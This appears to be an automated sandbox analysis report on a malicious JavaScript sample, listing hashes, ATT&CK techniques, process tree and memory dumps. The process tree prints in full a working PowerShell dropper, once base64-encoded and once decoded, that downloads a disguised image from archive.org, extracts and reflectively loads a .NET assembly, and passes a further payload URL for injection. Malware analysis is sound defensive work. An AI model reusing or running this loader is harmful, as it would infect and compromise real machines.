8dbbfc2bec2772f7fb6e82b2293220c521b165fabb50e6b6c19cb3234dcfe858

General

Target

04f2e728cb9c631c92f2b9e03f69931910866269d8f4723d8e33d4eb124c45ec.js
Size

598KB
MD5

4c0287584692314400f8051a8c734e95
SHA1

249e0641abdd69d0083eacb350b099d872211f8c
SHA256

04f2e728cb9c631c92f2b9e03f69931910866269d8f4723d8e33d4eb124c45ec
SHA512

3b424b7289ce6c6c1f9bd97c2cf5144b625299e50babe4afaa62981af1ddbedd40fe4c8bbd0d369e31d5d96e343101f76b1d591f709c6e423855a96865e45e85
SSDEEP

12288:WGKC2l0k5OFLSd28Wia/Lp5nE9ufGjG1o2jTtNELaZ4s4smIYfPahsqxFvhPToaN:7rI7XgYY

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2396	powershell.exe
6	2396	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2020	powershell.exe
2396	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2020	powershell.exe
2396	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1016 wrote to memory of 2020	1016	wscript.exe	28
PID 1016 wrote to memory of 2020	1016	wscript.exe	28
PID 1016 wrote to memory of 2020	1016	wscript.exe	28
PID 2020 wrote to memory of 2396	2020	powershell.exe	30
PID 2020 wrote to memory of 2396	2020	powershell.exe	30
PID 2020 wrote to memory of 2396	2020	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\04f2e728cb9c631c92f2b9e03f69931910866269d8f4723d8e33d4eb124c45ec.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADYAMAA2AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAwAC8AaQB0AGUAbQBzAC8AZABlAGEAdABoAG4AbwB0AGUAXwAyADAAMgA0ADAANwAvAGQAZQBhAHQAaABuAG8AdABlAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGIAZABtAC8AdgBlAGQALgAyAHIALgAzADkAYgAzADQANQAzADAAMgBhADAANwA1AGIAMQBiAGMAMABkADQANQBiADYAMwAyAGUAYgA5AGUAZQA2ADIALQBiAHUAcAAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwAgACwAIAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwAgACwAIAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwAsACcAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMAMwAyACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.bdm/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fc3c772d8cfbf6569a7476e7f675b319

SHA1
561373721372f158aa6c9605976e5f17a416d84d

SHA256
f11549c5e34df48d0d09fb75db26f1ffe31a4cba8eaf4097132eb63ec401ba87

SHA512
10a1977644192a626c47e18f6817c906058270d3f09447565d11ff2d9e489d85af68c8346ef0972a5334123bbf2f95900463c0ee7168c46b5ad274f3fa2a13fe

Download Submit
memory/2020-4-0x000007FEF572E000-0x000007FEF572F000-memory.dmp

Filesize
4KB

Download
memory/2020-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2020-7-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2020-8-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-10-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-9-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-11-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-17-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing